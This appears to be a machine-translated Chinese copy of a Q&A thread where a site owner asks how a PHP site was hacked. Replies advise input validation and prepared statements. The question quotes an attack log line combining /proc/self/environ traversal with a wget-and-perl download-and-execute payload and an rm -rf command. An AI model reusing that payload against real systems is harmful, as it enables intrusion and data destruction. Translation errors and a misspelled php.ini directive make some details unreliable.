我受到 PHP/脚本注入攻击 - 虚拟问题

Question

我的网站因网络钓鱼而受到攻击。这是一个复杂的网站，但我只使用 post 和 PHP 文件。

他们怎么能攻击我呢？我只使用 $_POST 所以我相信没有 SQL 命令和参数可见。 没有框架，只有我的小编码列表和网站上的访问。

任何提示/建议将不胜感激。

抱歉，如果我没有直接回复，但我正在与阻止整个网站的提供商打交道。

这是他们的答案（欢迎任何评论）：

因为脚本注入攻击站点代码本身，所以它能够完全避免网络服务器的安全。不幸的是，一些内容管理系统（尤其是旧版本的 Joomla）极易受到这种形式的攻击。

消除攻击者使用此方法的能力的一个简单方法是在网站的顶层添加一个包含以下内容的 php.ini 文件 - 但请注意，该网站随后需要进行测试以确保不会合法网站脚本操作已受到更改的影响：

---

php.ini 指令是...

allow_url_include = "0"

allowed_url_fopen = "0"

更新：

这是我从网络托管公司获得的信息：

121.254.216.170 - - [2011年9月12日:05:21:07 +0100]“获取/?p=../../../../../../../../ ../../../../../../../proc/self/environ%00 HTTP/1.1" 200第5806章etc/cup.txt;perl" rel="nofollow">http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*');回声“#j13mb0t”； ？>”

Answer 1

POST 请求也可以手动发出，例如使用 cURL。没有人可以阻止人们打开 telnet 终端并手动发出命令，并将任何参数发送到您的网站。

相反，您应该始终保护您的网站并验证输入。无论它们来自 POST、GET 还是其他任何地方。另外，更喜欢使用 PDO 而不是 PHP 中的标准 mysql 函数。

您能否详细说明一下您的网站上发生了什么样的攻击？

Answer 2

服务器被黑客攻击的方式有很多种。如果不了解有关您的项目或服务器的更多信息，则很难告诉您在您的案例中这是如何发生的。

但有一些提示：

请确保始终对写入数据库的数据进行转义。例如，您可以使用 mysql_real_escape_string() 。除了对您的脚本的攻击之外，您的服务器也可能受到攻击，例如通过 FTP 或 SSH。

除此之外，请始终确保更新您使用的所有流行框架/库。

Answer 3

$_POST 不是阻止 sql 攻击的有效方法。您必须对从 $_GET 或 $_POST 接收的所有值使用带有参数的准备好的语句，或者对所有这些参数使用 mysql_real_escape_string 。